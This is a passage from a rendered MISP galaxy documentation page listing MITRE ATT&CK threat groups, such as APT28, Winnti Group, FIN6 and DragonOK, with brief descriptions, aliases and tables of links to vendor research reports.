<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cobaltstrike.com/downloads/csmanual38.pdf">https://cobaltstrike.com/downloads/csmanual38.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_intrusion_set"><a class="anchor" href="#_intrusion_set"></a><a class="link" href="#_intrusion_set">intrusion Set</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK Group.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
intrusion Set is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/intrusion" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/intrusion</a> set.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_poseidon_group"><a class="anchor" href="#_poseidon_group"></a><a class="link" href="#_poseidon_group">Poseidon Group</a></h3>
<div class="paragraph">
<p>Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.[[Citation: Kaspersky Poseidon Group]]</p>
</div>
<div class="paragraph">
<p>Poseidon Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Poseidon Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1159. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0033">https://attack.mitre.org/wiki/Group/G0033</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/">https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_group5"><a class="anchor" href="#_group5"></a><a class="link" href="#_group5">Group5</a></h3>
<div class="paragraph">
<p>Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack.[[Citation: Citizen Lab Group5]]</p>
</div>
<div class="paragraph">
<p>Group5 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Group5</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1160. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0043">https://attack.mitre.org/wiki/Group/G0043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/08/group5-syria/">https://citizenlab.org/2016/08/group5-syria/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pittytiger"><a class="anchor" href="#_pittytiger"></a><a class="link" href="#_pittytiger">PittyTiger</a></h3>
<div class="paragraph">
<p>PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.[[Citation: Bizeul 2014]][[Citation: Villeneuve 2014]]</p>
</div>
<div class="paragraph">
<p>PittyTiger is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PittyTiger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1161. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0011">https://attack.mitre.org/wiki/Group/G0011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html">https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2">http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_admin_338"><a class="anchor" href="#_admin_338"></a><a class="link" href="#_admin_338">admin@338</a></h3>
<div class="paragraph">
<p>admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors.[[Citation: FireEye admin@338]]</p>
</div>
<div class="paragraph">
<p>admin@338 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>admin@338</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1162. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0018">https://attack.mitre.org/wiki/Group/G0018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rtm"><a class="anchor" href="#_rtm"></a><a class="link" href="#_rtm">RTM</a></h3>
<div class="paragraph">
<p>RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM).[[Citation: ESET RTM Feb 2017]]</p>
</div>
<div class="paragraph">
<p>RTM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RTM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1163. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0048">https://attack.mitre.org/wiki/Group/G0048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt16"><a class="anchor" href="#_apt16"></a><a class="link" href="#_apt16">APT16</a></h3>
<div class="paragraph">
<p>APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations.[[Citation: FireEye EPS Awakens Part 2]]</p>
</div>
<div class="paragraph">
<p>APT16 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT16</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1164. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0023">https://attack.mitre.org/wiki/Group/G0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt28"><a class="anchor" href="#_apt28"></a><a class="link" href="#_apt28">APT28</a></h3>
<div class="paragraph">
<p>APT28 is a threat group that has been attributed to the Russian government.[[Citation: FireEye APT28]][[Citation: SecureWorks TG-4127]][[Citation: FireEye APT28 January 2017]][[Citation: GRIZZLY STEPPE JAR]] This group reportedly compromised the Democratic National Committee in April 2016.[[Citation: Crowdstrike DNC June 2016]]</p>
</div>
<div class="paragraph">
<p>APT28 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT28</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>Sofacy</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>STRONTIUM</p>
</li>
<li>
<p>Tsar Team</p>
</li>
<li>
<p>Threat Group-4127</p>
</li>
<li>
<p>TG-4127</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1165. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0007">https://attack.mitre.org/wiki/Group/G0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign">https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winnti_group"><a class="anchor" href="#_winnti_group"></a><a class="link" href="#_winnti_group">Winnti Group</a></h3>
<div class="paragraph">
<p>Winnti Group is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. Though both this group and Axiom use the malware Winnti, the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting.[[Citation: Kaspersky Winnti April 2013]][[Citation: Kaspersky Winnti June 2015]][[Citation: Novetta Winnti April 2015]]</p>
</div>
<div class="paragraph">
<p>Winnti Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Winnti Group</p>
</li>
<li>
<p>Blackfly</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1166. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0044">https://attack.mitre.org/wiki/Group/G0044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/70991/games-are-over/">https://securelist.com/blog/incidents/70991/games-are-over/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deep_panda"><a class="anchor" href="#_deep_panda"></a><a class="link" href="#_deep_panda">Deep Panda</a></h3>
<div class="paragraph">
<p>Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.Deep Panda.Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion.[[Citation: Symantec Black Vine]]</p>
</div>
<div class="paragraph">
<p>Deep Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Deep Panda</p>
</li>
<li>
<p>Shell Crew</p>
</li>
<li>
<p>WebMasters</p>
</li>
<li>
<p>KungFu Kittens</p>
</li>
<li>
<p>PinkPanther</p>
</li>
<li>
<p>Black Vine</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1167. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0009">https://attack.mitre.org/wiki/Group/G0009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/">http://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/the-black-vine-cyberespionage-group.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf">https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_molerats"><a class="anchor" href="#_molerats"></a><a class="link" href="#_molerats">Molerats</a></h3>
<div class="paragraph">
<p>Molerats is a politically-motivated threat group that has been operating since 2012. The group&#8217;s victims have primarily been in the Middle East, Europe, and the United States.[[Citation: DustySky]][[Citation: DustySky2]]</p>
</div>
<div class="paragraph">
<p>Molerats is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Molerats</p>
</li>
<li>
<p>Gaza cybergang</p>
</li>
<li>
<p>Operation Molerats</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1168. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0021">https://attack.mitre.org/wiki/Group/G0021</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2%20-6.2016%20TLP%20White.pdf">http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2%20-6.2016%20TLP%20White.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_strider"><a class="anchor" href="#_strider"></a><a class="link" href="#_strider">Strider</a></h3>
<div class="paragraph">
<p>Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.[[Citation: Symantec Strider Blog]][[Citation: Kaspersky ProjectSauron Blog]]</p>
</div>
<div class="paragraph">
<p>Strider is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Strider</p>
</li>
<li>
<p>ProjectSauron</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1169. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0041">https://attack.mitre.org/wiki/Group/G0041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/">https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets">http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sandworm_team"><a class="anchor" href="#_sandworm_team"></a><a class="link" href="#_sandworm_team">Sandworm Team</a></h3>
<div class="paragraph">
<p>Sandworm Team is a cyber espionage group that has operated since approximately 2009 and has been attributed to Russia.[[Citation: iSIGHT Sandworm 2014]] This group is also known as Quedagh.[[Citation: F-Secure BlackEnergy 2014]]</p>
</div>
<div class="paragraph">
<p>Sandworm Team is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sandworm Team</p>
</li>
<li>
<p>Quedagh</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1170. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0034">https://attack.mitre.org/wiki/Group/G0034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.isightpartners.com/2014/10/cve-2014-4114/">http://www.isightpartners.com/2014/10/cve-2014-4114/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin6"><a class="anchor" href="#_fin6"></a><a class="link" href="#_fin6">FIN6</a></h3>
<div class="paragraph">
<p>FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.[[Citation: FireEye FIN6 April 2016]]</p>
</div>
<div class="paragraph">
<p>FIN6 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN6</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1171. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0037">https://attack.mitre.org/wiki/Group/G0037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dust_storm"><a class="anchor" href="#_dust_storm"></a><a class="link" href="#_dust_storm">Dust Storm</a></h3>
<div class="paragraph">
<p>Dust Storm is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries.[[Citation: Cylance Dust Storm]]</p>
</div>
<div class="paragraph">
<p>Dust Storm is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dust Storm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1172. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0031">https://attack.mitre.org/wiki/Group/G0031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512">https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cleaver"><a class="anchor" href="#_cleaver"></a><a class="link" href="#_cleaver">Cleaver</a></h3>
<div class="paragraph">
<p>Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver.[[Citation: Cylance Cleaver]] Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889).[[Citation: Dell Threat Group 2889]]</p>
</div>
<div class="paragraph">
<p>Cleaver is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cleaver</p>
</li>
<li>
<p>Threat Group 2889</p>
</li>
<li>
<p>TG-2889</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1173. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0003">https://attack.mitre.org/wiki/Group/G0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/">http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt12"><a class="anchor" href="#_apt12"></a><a class="link" href="#_apt12">APT12</a></h3>
<div class="paragraph">
<p>APT12 is a threat group that has been attributed to China.[[Citation: Meyers Numbered Panda]] It is also known as DynCalc, IXESHE, and Numbered Panda.[[Citation: Moran 2014]][[Citation: Meyers Numbered Panda]]</p>
</div>
<div class="paragraph">
<p>APT12 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT12</p>
</li>
<li>
<p>IXESHE</p>
</li>
<li>
<p>DynCalc</p>
</li>
<li>
<p>Numbered Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1174. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0005">https://attack.mitre.org/wiki/Group/G0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html">https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moafee"><a class="anchor" href="#_moafee"></a><a class="link" href="#_moafee">Moafee</a></h3>
<div class="paragraph">
<p>Moafee is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK. .[[Citation: Haq 2014]]</p>
</div>
<div class="paragraph">
<p>Moafee is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Moafee</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1175. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0002">https://attack.mitre.org/wiki/Group/G0002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_group_3390"><a class="anchor" href="#_threat_group_3390"></a><a class="link" href="#_threat_group_3390">Threat Group-3390</a></h3>
<div class="paragraph">
<p>is a Chinese threat group that has extensively used strategic Web compromises to target victims.[[Citation: Dell TG-3390]] The group has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors.[[Citation: SecureWorks BRONZE UNION June 2017]]</p>
</div>
<div class="paragraph">
<p>Threat Group-3390 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Threat Group-3390</p>
</li>
<li>
<p>TG-3390</p>
</li>
<li>
<p>Emissary Panda</p>
</li>
<li>
<p>BRONZE UNION</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1176. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0027">https://attack.mitre.org/wiki/Group/G0027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/bronze-union">https://www.secureworks.com/research/bronze-union</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dragonok"><a class="anchor" href="#_dragonok"></a><a class="link" href="#_dragonok">DragonOK</a></h3>
<div class="paragraph">
<p>DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. [[Citation: Operation Quantum Entanglement]][[Citation: Symbiotic APT Groups]] It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. [[Citation: New DragonOK]]</p>
</div>
<div class="paragraph">
<p>DragonOK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DragonOK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1177. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0017">https://attack.mitre.org/wiki/Group/G0017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/">http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</a></p></td>
</tr>
<tr>
